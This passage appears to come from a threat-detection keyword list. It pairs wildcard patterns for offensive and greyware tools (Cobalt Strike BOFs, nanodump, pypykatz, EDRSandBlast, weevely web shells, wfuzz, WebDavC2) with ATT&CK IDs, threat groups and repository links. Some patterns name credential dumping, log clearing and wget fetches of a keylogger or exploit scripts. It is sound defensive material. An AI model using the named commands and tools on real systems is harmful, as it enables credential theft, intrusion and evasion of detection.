- TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*wcfrelayserver.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*WCMCredentials.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*wdextract *:\*\*.vdm*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*wdextract *\mrt.exe*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*WDExtract-master*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,1,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*wdigest!g_fParameter_UseLogonCredential*,offensive_tool_keyword,cobaltstrike,A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/WdToggle,1,1,N/A,10,10,217,32,2023-05-03T19:51:43Z,2020-12-23T13:42:25Z -*wdigest!g_IsCredGuardEnabled*,offensive_tool_keyword,cobaltstrike,A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/WdToggle,1,1,N/A,10,10,217,32,2023-05-03T19:51:43Z,2020-12-23T13:42:25Z -*wdigest/decryptor.py*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*--wdigest-offsets *.csv *,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,0,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z -*WdigestOffsets.csv*,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,0,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z -*We had a woodoo*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*we.exe -s rssocks -d *,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*weak1337/Alcatraz*,offensive_tool_keyword,Alcatraz,x64 binary obfuscator,T1027 - T1140,TA0004 - TA0042,N/A,N/A,Defense Evasion,https://github.com/weak1337/Alcatraz,1,1,N/A,10,10,1345,219,2023-07-14T14:19:01Z,2022-12-21T17:27:56Z -*weakpass.com/crack-js*,offensive_tool_keyword,weakpass,Weakpass collection of tools for bruteforce and hashcracking,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/zzzteph/weakpass,1,1,N/A,10,3,293,36,2023-03-17T22:45:29Z,2021-08-29T13:07:37Z -*weakpass.com/generate*,offensive_tool_keyword,weakpass,Weakpass collection of tools for bruteforce and hashcracking,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/zzzteph/weakpass,1,1,N/A,10,3,293,36,2023-03-17T22:45:29Z,2021-08-29T13:07:37Z -*weakpass/crack-js*,offensive_tool_keyword,weakpass,Weakpass collection of tools for bruteforce and hashcracking,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/zzzteph/weakpass,1,1,N/A,10,3,293,36,2023-03-17T22:45:29Z,2021-08-29T13:07:37Z -*weakpass-main.*,offensive_tool_keyword,weakpass,Weakpass collection of tools for bruteforce and hashcracking,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/zzzteph/weakpass,1,1,N/A,10,3,293,36,2023-03-17T22:45:29Z,2021-08-29T13:07:37Z -*web_cloner/interceptor*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*WebBrowserPassView.exe*,offensive_tool_keyword,webBrowserPassView,WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. as long as the password is stored by your Web Browser.,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/web_browser_password.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*WebBrowserPassView.zip*,offensive_tool_keyword,webBrowserPassView,WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. as long as the password is stored by your Web Browser.,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/web_browser_password.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*webcamsnap -v*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*webclientservicescanner -dc-ip *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*WebDavC2*,offensive_tool_keyword,WebDavC2,WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.,T1571 - T1210.001 - T1190,TA0003 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/Arno0x/WebDavC2,1,0,N/A,10,10,116,72,2019-08-27T06:51:42Z,2017-09-07T14:00:28Z -*webdavC2.py*,offensive_tool_keyword,WebDavC2,WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.,T1571 - T1210.001 - T1190,TA0003 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/Arno0x/WebDavC2,1,0,N/A,10,10,116,72,2019-08-27T06:51:42Z,2017-09-07T14:00:28Z -*WebDavC2-master.zip*,offensive_tool_keyword,WebDavC2,WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.,T1571 - T1210.001 - T1190,TA0003 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/Arno0x/WebDavC2,1,0,N/A,10,10,116,72,2019-08-27T06:51:42Z,2017-09-07T14:00:28Z -*webdavC2server.py*,offensive_tool_keyword,WebDavC2,WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.,T1571 - T1210.001 - T1190,TA0003 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/Arno0x/WebDavC2,1,0,N/A,10,10,116,72,2019-08-27T06:51:42Z,2017-09-07T14:00:28Z -*WebDeveloperSecurityChecklist*,offensive_tool_keyword,WebDeveloperSecurityChecklist,A checklist of important security issues you should consider when creating a web application.can be used by attacker to check wweakness to exploit,T1593 - T1594 - T1595 - T1567,TA0007 - TA0009 - TA0004,N/A,N/A,Information Gathering,https://github.com/virajkulkarni14/WebDeveloperSecurityChecklist,1,0,N/A,N/A,5,406,59,2021-05-10T07:48:47Z,2017-05-16T20:31:38Z -*web-hacking-toolkit.git*,offensive_tool_keyword,web-hacking-toolkit,A web hacking toolkit Docker image with GUI applications support.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/signedsecurity/web-hacking-toolkit,1,1,N/A,N/A,2,142,29,2023-01-31T10:11:30Z,2021-10-16T15:47:52Z -*webshell http*/tomcatwar.jsp?cmd=*,offensive_tool_keyword,Spring4Shell,CVE-2022-22965 - CVE-2010-1622 redux,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/DDuarte/springshell-rce-poc,1,0,N/A,N/A,1,21,12,2023-04-18T14:15:42Z,2022-03-31T08:06:46Z -*webshell_execute*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*webshell-exegol.php*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*weevely generate *.php*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*weevely https://*.php * id*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*weird status:*,greyware_tool_keyword,vsftpd,Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dagwieers/vsftpd/,1,0,greyware tool - risks of False positive !,N/A,1,47,66,2020-11-10T13:07:55Z,2013-06-13T10:11:54Z -*Welcome to OpenBullet 2*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/OpenBullet2,1,0,N/A,10,10,1329,424,2023-09-25T22:57:36Z,2020-04-23T14:04:16Z -*wePWNise*,offensive_tool_keyword,wePWNise,wePWNise is proof-of-concept Python script which generates VBA code that can be used in Office macros or templates. It was designed with automation and integration in mind. targeting locked down environment scenarios. The tool enumerates Software Restriction Policies (SRPs) and EMET mitigations and dynamically identifies safe binaries to inject payloads into. wePWNise integrates with existing exploitation frameworks (e.g. Metasploit. Cobalt Strike) and it also accepts any custom payload in raw format.,T1203 - T1059 - T1564.001,TA0002 - TA0003 - TA0007,N/A,N/A,POST Exploitation tools,https://github.com/FSecureLABS/wePWNise,1,0,N/A,N/A,4,351,107,2018-08-27T22:00:25Z,2016-11-09T11:01:11Z -*werdhaihai/AtlasReaper*,offensive_tool_keyword,AtlasReaper,A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.,T1210.002 - T1078.003 - T1046 ,TA0001 - TA0007 - TA0040,N/A,N/A,Reconnaissance,https://github.com/werdhaihai/AtlasReaper,1,1,N/A,3,3,202,21,2023-09-14T23:50:33Z,2023-06-24T00:18:41Z -*werfault_shtinkering*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*werfault_silent_process_exit*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*WerTrigger.exe*,offensive_tool_keyword,WerTrigger,Weaponizing for privileged file writes bugs with windows problem reporting,T1059.003 - T1055.001 - T1127.001 - T1546.008,TA0002 - TA0004 ,N/A,N/A,Privilege Escalation,https://github.com/sailay1996/WerTrigger,1,1,N/A,9,2,147,34,2022-05-10T17:36:49Z,2020-05-20T11:27:56Z -*WerTrigger-master*,offensive_tool_keyword,WerTrigger,Weaponizing for privileged file writes bugs with windows problem reporting,T1059.003 - T1055.001 - T1127.001 - T1546.008,TA0002 - TA0004 ,N/A,N/A,Privilege Escalation,https://github.com/sailay1996/WerTrigger,1,1,N/A,9,2,147,34,2022-05-10T17:36:49Z,2020-05-20T11:27:56Z -*wevtutil cl *,greyware_tool_keyword,wevtutil,adversaries can delete specific event logs or clear their contents. erasing potentially valuable information that could aid in detection. incident response. or forensic investigations. This tactic aims to hinder forensic analysis efforts and make it more challenging for defenders to reconstruct the timeline of events or identify malicious activities.,T1070.004 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,10,10,N/A,N/A,N/A,N/A -*wevtutil qe security /format:text /q:*Event[System[(EventID=4624)]*find *Source Network Address*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*wfencode -*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*wfencode -e *,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*wfencode.bat*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*wfencode.py*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*wfpayload -*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*wfpayload.bat*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*wfpayload.py*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*WfpEscalation.exe*,offensive_tool_keyword,NoFilter,Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.,T1548 - T1548.002 - T1055 - T1055.004,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/deepinstinct/NoFilter,1,1,N/A,9,3,257,42,2023-08-20T07:12:01Z,2023-07-30T09:25:38Z -*WfpTokenDup.exe -*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,0,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*wfuzz --*.txt*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*wfuzz*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*wfuzz.bat*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*wfuzz.get_payload*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*wfuzz.py*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*wfuzz.wfuzz*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*wfuzz/wordlist*,offensive_tool_keyword,wordlists,package contains the rockyou.txt wordlist,T1110.001,TA0006,N/A,N/A,Credential Access,https://www.kali.org/tools/wordlists/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*wfuzz-cli.py*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*wfuzzp.py*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*wgen.py*,offensive_tool_keyword,Python-Wordlist-Generator,Create awesome wordlists with Python.,T1110 - T1588 - T1602,TA0001 - TA0006,N/A,N/A,Credential Access,https://github.com/agusmakmun/Python-Wordlist-Generator,1,0,N/A,N/A,1,96,37,2019-06-12T13:23:17Z,2015-05-22T12:32:01Z -*wget *http-vuln-cve2020-5902.nse*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*wget* -O les.sh*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*wget*.interact.sh*,offensive_tool_keyword,interactsh,Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C2,T1566.002 - T1566.001 - T1071 - T1102,TA0011 - TA0001,N/A,N/A,C2,https://github.com/projectdiscovery/interactsh,1,1,FP risk - legitimate service abused by attackers - move to admintools ?,10,10,2675,317,2023-10-02T08:20:04Z,2021-01-29T14:31:51Z -*wget*/drapl0n/DuckyLogger/blob/main/xinput\?raw=true*,offensive_tool_keyword,OMGLogger,Key logger which sends each and every key stroke of target remotely/locally.,T1056.001 - T1562.001,TA0004 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*Wh04m1001/DFSCoerce*,offensive_tool_keyword,DFSCoerce,PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?,T1550.001 - T1078.003 - T1046,TA0002 - TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Wh04m1001/DFSCoerce,1,1,N/A,10,7,635,78,2022-09-09T17:45:41Z,2022-06-18T12:38:37Z -*wh0amitz/BypassCredGuard*,offensive_tool_keyword,BypassCredGuard,Credential Guard Bypass Via Patching Wdigest Memory,T1558 - T1558.001 - T1055 - T1055.002,TA0006 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wh0amitz/BypassCredGuard,1,1,N/A,10,3,277,50,2023-02-03T06:55:43Z,2023-01-18T15:16:11Z -*wh0amitz/S4UTomato*,offensive_tool_keyword,S4UTomato,Escalate Service Account To LocalSystem via Kerberos,T1558 - T1558.002 - T1548.002 